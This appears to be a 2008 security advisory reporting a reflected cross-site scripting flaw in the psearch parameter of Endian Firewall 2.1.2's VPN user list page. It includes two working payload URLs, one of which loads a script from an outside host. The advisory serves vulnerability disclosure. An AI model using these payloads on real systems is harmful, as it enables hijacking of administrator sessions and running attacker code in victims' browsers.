The Endian Firewall version 2.1.2 suffers from a cross site scripting vulnerability.
2761b01b4d40f21655e1a04883fb4031535e7c3d2f8e353ff184c18217f2aae1#Security Advisory - Multiple Vulnerabilities in Endian firewall#
Endian Firewall is a "turn-key" linux security distribution that turns every system into a full featured security appliance. It features stateful packet filtering, proxies, antivirus/antispam, content filtering and a VPN module.
Date : 01-28-2008
Product : Endian Firewall
Version : 2.1.2 - Prior version maybe also be affected
Vendor : https://www.endian.com/en/
Author : syniack
Contact : syniack@gmail.com
S.Page : https://bsecure.net.pk
XSS Vulnerability: [TESTED]
Security issue in the following file:
vpnum/userslist.php?psearch=xss
Example:
https://www.example.com/vpnum/userslist.php?psearch="><scriptsrc=https://www.example2.com/re.js></script>
https://www.example.com/vpnum/userslist.php?psearch="><script>alert(1);</script>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed